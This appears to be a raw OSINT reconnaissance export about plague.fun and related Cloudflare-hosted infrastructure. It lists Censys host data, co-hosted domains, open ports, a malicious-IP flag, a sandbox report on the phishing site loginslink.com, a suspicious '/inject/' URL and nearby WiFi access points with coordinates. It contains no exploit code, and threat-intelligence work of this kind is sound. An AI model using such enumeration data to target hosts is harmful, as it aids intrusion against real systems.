"resolved_at": "2022-10-16T17:06:44.448663582Z"}, "133335.xyz": {"record_type": "AAAA", "resolved_at": "2022-10-05T17:45:47.967622672Z"}, "panel.moeking.me": {"record_type": "AAAA", "resolved_at": "2022-09-28T16:39:39.161526355Z"}, "beautybeyondhair.buzz": {"record_type": "AAAA", "resolved_at": "2022-11-20T12:28:51.523273907Z"}, "sub.133335.xyz": {"record_type": "AAAA", "resolved_at": "2022-10-03T20:37:50.410080500Z"}, "moeking.me": {"record_type": "AAAA", "resolved_at": "2022-09-30T15:32:44.686639976Z"}, "sign.moeking.me": {"record_type": "AAAA", "resolved_at": "2022-09-28T16:39:39.465293148Z"}, "gh.133335.xyz": {"record_type": "AAAA", "resolved_at": "2022-09-24T19:46:42.025854438Z"}, "password.moeking.me": {"record_type": "AAAA", "resolved_at": "2022-09-25T16:38:19.046997106Z"}, "de.133335.xyz": {"record_type": "AAAA", "resolved_at": "2022-10-04T17:06:49.855589981Z"}, "mail.wolny.poker": {"record_type": "AAAA", "resolved_at": "2022-10-30T17:30:49.591604261Z"}}, "names": ["sub.133335.xyz", "www.wolny.poker", "beautybeyondhair.buzz", "www.133335.xyz", "133335.xyz", "password.moeking.me", "wolny.poker", "uncoveryourconfidence.org", "sign.moeking.me", "mail.wolny.poker", "de.133335.xyz", "panel.moeking.me", "gh.133335.xyz", "beautybeyondhair.net", "moeking.me"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://[2a06:98c1:3120::1]/"}, "response": {"body": "\n\n\n\n \n\nDirect IP access not allowed | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

\n Error\n 1003\n

\n Ray ID: 7795ba721cfd2a2d •\n 2022-12-14 08:56:47 UTC\n

Direct IP access not allowed

\n
\n\n
\n
\n

What happened?

\n

You've requested an IP address that is part of the Cloudflare network. A valid Host header must be supplied to reach the desired website.

\n \n
\n\n \n
\n

What can I do?

\n

If you are interested in learning more about Cloudflare, please visit our website.

\n
\n \n
\n\n
\n
\n Was this page helpful?\n \n \n
\n
\n Thank you for your feedback!\n
\n
\n\n\n
\n

\n Cloudflare Ray ID: 7795ba721cfd2a2d\n \n \n Performance & security by Cloudflare\n \n

\n \n
\n\n\n
\n
\n\n \n\n\n\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "Direct IP access not allowed | Cloudflare", "protocol": "HTTP/1.1", "body_size": 5906, "body_hashes": ["sha256:78b2be18ce6c68609859df83c9d208537edadd4b432d976158103d393be0630a", "sha1:885c3a7132ecf6470d6d2838e3bb24915d944f8a"], "status_code": 403, "body_hash": "sha1:885c3a7132ecf6470d6d2838e3bb24915d944f8a", "headers": {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7795ba721cfd2a2d-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]}, "html_tags": ["Direct IP access not allowed | Cloudflare", "", "", "", "\n \n \n \n\n \n \n A list of the Windows versions that this application has been tested on\n and is designed to work with. Uncomment the appropriate elements\n and Windows will automatically select the most compatible environment. -->\n\n Windows Vista -->\n -->\n\n Windows 7 -->\n -->\n\n Windows 8 -->\n -->\n\n Windows 8.1 -->\n -->\n\n Windows 10 -->\n -->\n\n \n \n\n Indicates that the application is DPI-aware" (Indicator: "select"), "and will not be automatically scaled by Windows at higher\n DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need \n to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting\n should \n also set the \'EnableWindowsFormsHighDpiAutoResizing\' setting to \'true\' in their app.config. \n \n Makes the application long-pat 34.149.204.188 2022-12-18 00:21:47 Raw Data from RIRs No Censys 0 0 2 0 None {"last_updated_at": "2022-12-17T21:38:21.662Z", "ip": "2606:4700:3032::ac43:8925", "location_updated_at": "2022-12-03T18:33:45.372439Z", "autonomous_system_updated_at": "2022-12-15T10:05:21.479444Z", "location": {"country": "United States", "coordinates": {"latitude": 37.751, "longitude": -97.822}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "", "country_code": "US", "timezone": "America/Chicago", "continent": "North America"}, "dns": {"records": {"mail.nocktech.com": {"record_type": "AAAA", "resolved_at": "2022-11-29T13:44:31.524796191Z"}, "avbsex.xyz": {"record_type": "AAAA", "resolved_at": "2022-09-24T16:37:51.559199365Z"}, "fetch-refinancevaloan.fyi": {"record_type": "AAAA", "resolved_at": "2022-12-16T14:40:04.060460070Z"}, "m6a5893.com": {"record_type": "AAAA", "resolved_at": "2022-11-23T16:14:26.731382864Z"}, "nicola-cohen.com": {"record_type": "AAAA", "resolved_at": "2022-12-07T17:24:28.166044591Z"}, "elexcorwordflitlo.tk": {"record_type": "AAAA", "resolved_at": "2022-11-25T17:21:28.874330646Z"}, "790zzz.com": {"record_type": "AAAA", "resolved_at": "2022-10-11T12:42:59.419328178Z"}, "m.xtremeyachting.com": {"record_type": "AAAA", "resolved_at": "2022-12-08T14:15:25.253427643Z"}, "cosmetic-md.com": {"record_type": "AAAA", "resolved_at": "2022-12-08T13:10:44.717144991Z"}, "www.ucouldbehere.com.au": {"record_type": "AAAA", "resolved_at": "2022-12-14T12:12:47.934185538Z"}, "dylansheffer.app": {"record_type": "AAAA", "resolved_at": "2022-11-12T15:43:01.855546614Z"}, "nerdietech.com": {"record_type": "AAAA", "resolved_at": "2022-12-14T14:00:07.987200637Z"}, "pghbusinessplus.com": {"record_type": "AAAA", "resolved_at": "2022-12-03T13:54:45.868033682Z"}, "cpcalendars.nocktech.com": {"record_type": "AAAA", "resolved_at": "2022-11-29T13:44:31.046132581Z"}, "parklandverticalsolutions.com": {"record_type": "AAAA", "resolved_at": "2022-12-04T13:54:26.297030627Z"}, "exclaim.ai": {"record_type": "AAAA", "resolved_at": "2022-10-29T12:06:29.029140141Z"}, "mkt.mariahost.com.br": {"record_type": "AAAA", "resolved_at": "2022-11-30T12:18:50.807559206Z"}, "www.cropcirclecyclist.com": {"record_type": "AAAA", "resolved_at": "2022-12-08T13:11:21.154152886Z"}, "apicsentheofo.cf": {"record_type": "AAAA", "resolved_at": "2022-11-29T12:30:49.691581028Z"}, "eddymusic.co": {"record_type": "AAAA", "resolved_at": "2022-12-13T12:37:15.105040306Z"}, "webdisk.miani.co.il": {"record_type": "AAAA", "resolved_at": "2022-12-06T15:31:59.911330362Z"}, "sonarr.dylansheffer.app": {"record_type": "AAAA", "resolved_at": "2022-12-07T12:05:50.819389238Z"}, "observatorioelectoral.net": {"record_type": "AAAA", "resolved_at": "2022-11-21T15:36:24.127625252Z"}, "tramohef.cf": {"record_type": "AAAA", "resolved_at": "2022-12-15T12:27:09.804832274Z"}, "www.staging2.parentinghighschoolers.com": {"record_type": "CNAME", "resolved_at": "2022-10-23T13:54:26.723275190Z"}, "www.ruspornotv.com": {"record_type": "AAAA", "resolved_at": "2022-12-10T13:49:27.065551840Z"}, "cpanel.developingservicemanagement.com": {"record_type": "AAAA", "resolved_at": "2022-11-30T13:19:53.251533196Z"}, "www.bulkwear.club": {"record_type": "AAAA", "resolved_at": "2022-12-03T12:35:06.136733985Z"}, "foxhelicopterservices.com.au": {"record_type": "AAAA", "resolved_at": "2022-12-07T12:11:11.449280538Z"}, "www.mamatakecare.com": {"record_type": "CNAME", "resolved_at": "2022-12-07T13:48:57.083633204Z"}, "lafatipitin.buzz": {"record_type": "AAAA", "resolved_at": "2022-10-20T12:32:57.933147406Z"}, "niecirwa.ml": {"record_type": "AAAA", "resolved_at": "2022-12-07T15:46:26.318869518Z"}, "kazino-online-vulkan.com": {"record_type": "AAAA", "resolved_at": "2022-11-20T13:34:45.205384429Z"}, "reiserdumo.cf": {"record_type": "AAAA", "resolved_at": "2022-11-25T12:30:26.211383385Z"}, "fasthighoubudho.gq": {"record_type": "AAAA", "resolved_at": "2022-12-10T14:33:48.548055558Z"}, "gxdsx.com": {"record_type": "AAAA", "resolved_at": "2022-12-01T13:28:26.862331634Z"}, "erp.orfican.es": {"record_type": "AAAA", "resolved_at": "2022-12-05T14:49:25.632402183Z"}, "ianwinters.com": {"record_type": "AAAA", "resolved_at": "2022-12-06T13:47:01.852514052Z"}, "huachate.gq": {"record_type": "AAAA", "resolved_at": "2022-12-05T14:57:38.619293401Z"}, "tourismnotes.es": {"record_type": "AAAA", "resolved_at": "2022-10-21T14:21:49.436095003Z"}, "untandirfnar.ml": {"record_type": "AAAA", "resolved_at": "2022-12-04T15:31:53.825092165Z"}, "presserna.cf": {"record_type": "AAAA", "resolved_at": "2022-12-11T12:33:14.937580976Z"}, "junctionsanmarcos.com": {"record_type": "AAAA", "resolved_at": "2022-12-09T13:32:30.257830741Z"}, "marcjacobsbagsshops.com": {"record_type": "AAAA", "resolved_at": "2022-11-28T13:29:45.465305047Z"}, "ido.miani.co.il": {"record_type": "AAAA", "resolved_at": "2022-12-15T14:53:07.974813782Z"}, "cataconceptstore.com.ar": {"record_type": "AAAA", "resolved_at": "2022-12-15T12:05:26.068068699Z"}, "claudiu-lazar.com": {"record_type": "AAAA", "resolved_at": "2022-11-30T13:15:51.227846403Z"}, "www.patchstream.com": {"record_type": "AAAA", "resolved_at": "2022-10-22T13:58:35.100905096Z"}, "yinshanyl.com": {"record_type": "AAAA", "resolved_at": "2022-12-03T14:24:49.498689780Z"}, "cloud.filee-regulation.workers.dev": {"record_type": "AAAA", "resolved_at": "2022-12-15T12:06:37.965143604Z"}, "slopaqpanho.tk": {"record_type": "AAAA", "resolved_at": "2022-12-13T17:53:55.838956318Z"}, "datesligenu-besked.com": {"record_type": "AAAA", "resolved_at": "2022-11-20T13:17:52.537955733Z"}, "31287.one": {"record_type": "AAAA", "resolved_at": "2022-12-02T17:02:02.428421162Z"}, "sanjeevnihindi.com": {"record_type": "AAAA", "resolved_at": "2022-11-07T03:43:35.135538158Z"}, "sighstitreslexb.tk": {"record_type": "AAAA", "resolved_at": "2022-12-07T17:29:23.444853377Z"}, "www.vgyanfoundation.com": {"record_type": "CNAME", "resolved_at": "2022-12-02T14:25:46.821484501Z"}, "www.junctionsanmarcos.com": {"record_type": "AAAA", "resolved_at": "2022-12-14T13:45:14.259713430Z"}, "shop-jintropin.com": {"record_type": "AAAA", "resolved_at": "2022-12-10T13:51:24.765670202Z"}, "www.fvbowling.com.ve.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2022-12-01T15:43:49.524130454Z"}, "rjoutdoorsolutions.com": {"record_type": "AAAA", "resolved_at": "2022-12-11T07:45:16.069041928Z"}, "nolanmcphail.com": {"record_type": "AAAA", "resolved_at": "2022-12-03T13:50:08.217185933Z"}, "www.treinoemfoco.com.br": {"record_type": "AAAA", "resolved_at": "2022-11-29T12:19:31.493572277Z"}, "tragapnesikena.gq": {"record_type": "AAAA", "resolved_at": "2022-12-10T14:33:16.595325606Z"}, "preziair.expert": {"record_type": "AAAA", "resolved_at": "2022-11-25T15:06:21.893403082Z"}, "websterorlando.com": {"record_type": "AAAA", "resolved_at": "2022-12-14T14:36:30.629004096Z"}, "deemix.dylansheffer.app": {"record_type": "AAAA", "resolved_at": "2022-12-04T12:04:53.626839128Z"}, "qm19vcef.fun": {"record_type": "AAAA", "resolved_at": "2022-12-08T14:48:50.807073094Z"}, "do-universidad-en-linea-ecs-ok.live": {"record_type": "AAAA", "resolved_at": "2022-12-04T15:27:56.015706026Z"}, "ukrainianwomen.date": {"record_type": "AAAA", "resolved_at": "2022-11-20T14:22:50.795443150Z"}, "chetrehiptoba.tk": {"record_type": "AAAA", "resolved_at": "2022-12-14T17:42:00.842562895Z"}, "treinoemfoco.com.br": {"record_type": "AAAA", "resolved_at": "2022-12-12T12:18:25.251493268Z"}, "atriomwriting.com": {"record_type": "AAAA", "resolved_at": "2022-12-14T06:46:41.303331944Z"}, "www.perlasimeone.online": {"record_type": "CNAME", "resolved_at": "2022-12-05T19:13:27.918506677Z"}, "be-us-pancreatic-cancer-treatment-ok.live": {"record_type": "AAAA", "resolved_at": "2022-11-22T15:58:03.273859266Z"}, "torrent.dylansheffer.app": {"record_type": "AAAA", "resolved_at": "2022-11-30T12:06:29.302819464Z"}, "www.voronka.dp.ua": {"record_type": "AAAA", "resolved_at": "2022-11-16T17:08:14.361545226Z"}, "www.groundingstoneprop.com": {"record_type": "AAAA", "resolved_at": "2022-11-02T13:38:17.139313570Z"}, "xtremeyachting.com": {"record_type": "AAAA", "resolved_at": "2022-11-22T14:44:25.332031259Z"}, "mcp.com.vn": {"record_type": "AAAA", "resolved_at": "2022-11-20T17:12:47.814350755Z"}, "gravtheinasonvi.ml": {"record_type": "AAAA", "resolved_at": "2022-12-15T15:24:45.913409476Z"}, "skepekclosovbopha.ga": {"record_type": "AAAA", "resolved_at": "2022-12-06T13:39:07.348526609Z"}, "funhaven.nocktech.com": {"record_type": "AAAA", "resolved_at": "2022-10-02T13:33:09.251071599Z"}, "ribqcywz.com": {"record_type": "AAAA", "resolved_at": "2022-12-15T13:52:34.491072013Z"}, "webdisk.anomandaris.eu": {"record_type": "AAAA", "resolved_at": "2022-11-29T14:41:56.493195738Z"}, "presurforna.cf": {"record_type": "AAAA", "resolved_at": "2022-12-15T12:26:38.339486682Z"}, "natashaburger.com": {"record_type": "AAAA", "resolved_at": "2022-12-11T16:51:51.669184825Z"}, "casino-pinup-site-official.win": {"record_type": "AAAA", "resolved_at": "2022-12-15T23:03:49.668626418Z"}, "metbertneruddesp.cf": {"record_type": "AAAA", "resolved_at": "2022-12-12T18:51:22.002935281Z"}, "cdn-6.mamatakecare.com.cdn.cloudflare.net": {"record_type": "AAAA", "resolved_at": "2022-12-04T15:53:45.154220043Z"}, "todoapp.avinashrathod.in": {"record_type": "AAAA", "resolved_at": "2022-12-14T15:20:56.567076509Z"}, "pl.ukrainianwomen.date": {"record_type": "AAAA", "resolved_at": "2022-12-06T14:50:18.281969258Z"}, "moodle.amolla.gr": {"record_type": "AAAA", "resolved_at": "2022-12-02T15:06:12.327010077Z"}, "web-connectqw.ga": {"record_type": "AAAA", "resolved_at": "2022-12-03T14:58:25.067913029Z"}, "www.thronedigitalmarketing.com": {"record_type": "AAAA", "resolved_at": "2022-12-16T14:03:45.257062629Z"}, "www.natashaburger.com": {"record_type": "AAAA", "resolved_at": "2022-12-08T13:44:58.397607687Z"}, "tepponess.gq": {"record_type": "AAAA", "resolved_at": "2022-11-26T14:52:38.976175659Z"}, "gr.ukrainianwomen.date": {"record_type": "AAAA", "resolved_at": "2022-12-08T14:18:14.938434977Z"}, "go.tim4421.workers.dev": {"record_type": "AAAA", "resolved_at": "2022-11-29T14:34:46.581667619Z"}, "mail.faceof.me": {"record_type": "AAAA", "resolved_at": "2022-12-14T15:50:29.971190809Z"}, "suddenlinksavings.com": {"record_type": "AAAA", "resolved_at": "2022-12-04T14:13: 2606:4700:3032::ac43:8925 2022-12-18 00:21:06 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77ade072690313ce-ORD Content-Encoding: gzip 172.67.147.230 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None validarpichincha--ecuadorr.repl.co 34.149.204.188 2022-12-18 00:40:30 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.10] https://www.virustotal.com/en/ip-address/188.114.96.10/information/ 188.114.96.0/24 2022-12-18 00:03:10 SSL Certificate - Issued to No SSL Certificate Analyzer 0 0 1 0 None C=IT,ST=Firenze,O=Register S.p.A.,CN=*.webapps.net zerotwo-best-waifu.online 2022-12-18 00:10:04 Web Server No URLScan.io 0 1 1 0 None Werkzeug/2.2.2 Python/3.8.10 plague.fun 2022-12-18 00:02:48 Co-Hosted Site No CertSpotter 0 0 1 0 None sni.cloudflaressl.com rasputain.fr 2022-12-18 00:32:13 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.tools plague.fun 2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b305834e440380-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.96.1 2022-12-18 00:24:56 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 90.116.149.178 90.116.149.183 2022-12-18 00:23:32 Raw DNS Records No DNS Raw Records 0 0 2 0 None webmail.zerotwo-best-waifu.online. 900 IN CNAME webmail-fr.setupdns.net. webmail.zerotwo-best-waifu.online 2022-12-18 00:33:43 Open TCP Port No Pulsedive 0 0 4 0 None 195.110.124.188:8080 195.110.124.0/24 2022-12-18 00:21:06 Open TCP Port No Censys 0 0 2 0 None 172.67.147.230:8443 172.67.147.230 2022-12-18 00:09:40 Co-Hosted Site No HackerTarget 0 0 2 0 None a-prime-us-credit-cards.zone 172.67.147.230 2022-12-18 00:18:46 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.20:443 188.114.97.0/24 2022-12-18 00:32:33 Open TCP Port No Pulsedive 0 0 4 0 None 195.110.124.154:80 195.110.124.0/24 2022-12-18 00:31:32 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.link plague.fun 2022-12-18 00:08:24 Netblock Membership No RIPE 0 0 2 0 None 188.114.96.0/24 188.114.96.1 2022-12-18 00:05:27 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 50, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://loginslink.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_a3c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_a3c_IESQMMUTEX_0_519"\n "IsoScope_a3c_ConnHashTable<2620>_HashTable_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_a3c_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_a3c_IE_EarlyTabStart_0xcd8_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2620"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_a3c_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2620"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.7.179:443"\n "184.30.81.10:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFF38.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarFFD6.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"loginslink.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"\n "urlref_httpsloginslink.com" has type "HTML document UTF-8 Unicode text with CRLF LF line terminators"\n "4K1MNPLT.txt" has type "ASCII text"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"\n "RecoveryStore._74A0AD83-B41D-11EC-B77F-080027424AF0_.dat" has type "Composite Document File V2 Document Cannot read section info"\n "~DFBDEB43A8F9E4B832.TMP" has type "data"\n "TarFF38.tmp" has type "data"\n "~DFEB1F9EF6A4CBFA27.TMP" has type "data"\n "~DF7324F32B2C4302D4.TMP" has type "data"\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"\n "2191DF0A39D0F64EC4B0325ADF87D605" has type "data"\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "V7PST9UP.txt" has type "ASCII text"\n "CabFF27.tmp" has type "Microsoft Cabinet archive data 60992 bytes 1 file"\n "9A5M6R2Y.txt" has type "ASCII text"\n "76IYW2V1.txt" has type "ASCII text"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://loginslink.com/"\n Pattern match: "https://loginslink.com"\n Heuristic match: "loginslink.com"\n Pattern match: "https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "CabFF27.tmp" has type "Microsoft Cabinet archive data 60992 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 60992 bytes 1 file"\n "CabFF67.tmp" has type "Microsoft Cabinet archive data 60992 bytes 1 file"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-23', u'name': u'Sends traffic on typical HTTP outbound port, but without HTTP header', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 7, u'description': u'TCP traffic to 104.21.7.179 on port 443 is sent without HTTP header\n TCP traffic to 184.30.81.10 on port 443 is sent without HTTP header'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'1/93 Antivirus vendors marked sample as malicious (1% detection rate)'}], u'threat_level': 2, u'size': None, u'job_id': u'624b109abb4d0a7c532a3661', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 0, u'suspicious_identifiers_count': 1}], u'certificates': [], u'hosts': [u'104.21.7.179', u'184.30.81.10'], u'sha256': u'c01369f3b3621bdc63aef011bbf1c74b2fb984a1aff5c0120ca9738357c4c2af', u'sha512': u'b1e47a68fc0d3cd35b80ff617d80fa40cf279d3dd6f1d9a31df7282b0fc62b2ec5057020b66119af4b6846e97267f7f99384ef9e6ee0ff7192d70e76d87de00c', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://loginslink.com/', u'submission_id': u'624b109abb4d0a7c532a3662', u'created_at': u'2022-04-04T15:36:58+00:00', u'filename': None}], u'analysis_start_time': u'2022-04-04T15:43:10+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 2, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 10, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'e42f8f7948a2967d4cc53f65162d9389', u'network_mode': u'default', u'processes': [], u'sha1': u'ff9b29c3034fc1f366f8d7fd7b8b97fb38e532d7', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Phishing site', u'environment_description': u'Windows 7 64 bit', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [u'loginslink.com'], u'extracted_files': [], u'type_short': []}] 104.21.7.179 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 00:02:2D:05:7E:8A (Net ID: 00:02:2D:05:7E:8A) 37.780462,-122.390564 2022-12-18 00:18:35 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.15:80 188.114.97.0/24 2022-12-18 00:21:30 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 172.67.190.129 2022-12-18 00:13:56 HTTP Status Code No Web Spider 0 0 2 0 None None http://wasp.plague.fun/inject/Fu643XzaSbmCcnGN 2022-12-18 00:29:08 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.org.uk plague.fun 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None krillnet (Net ID: 00:01:8E:15:D4:A6) 37.780462,-122.390564 2022-12-18 00:11:10 Similar Domain - Whois No Whois 1 0 2 0 None % The WHOIS service offered by EURid and the access to the records % in the EURid WHOIS database are provided for information purposes % only. It allows persons to check whether a specific domain name % is still available or not and to obtain information related to % the registration records of existing domain names. % % EURid cannot, under any circumstances, be held liable in case the % stored information would prove to be wrong, incomplete or not % accurate in any sense. % % By submitting a query you agree not to use the information made % available to: % % - allow, enable or otherwise support the transmission of unsolicited, % commercial advertising or other solicitations whether via email or % otherwise; % - target advertising in any possible way; % % - to cause nuisance in any possible way to the registrants by sending % (whether by automated, electronic processes capable of enabling % high volumes or other possible means) messages to them. % % Without prejudice to the above, it is explicitly forbidden to extract, % copy and/or use or re-utilise in any form and by any means % (electronically or not) the whole or a quantitatively or qualitatively % substantial part of the contents of the WHOIS database without prior % and explicit permission by EURid, nor in any attempt hereof, to apply % automated, electronic processes to EURid (or its systems). % % You agree that any reproduction and/or transmission of data for % commercial purposes will always be considered as the extraction of a % 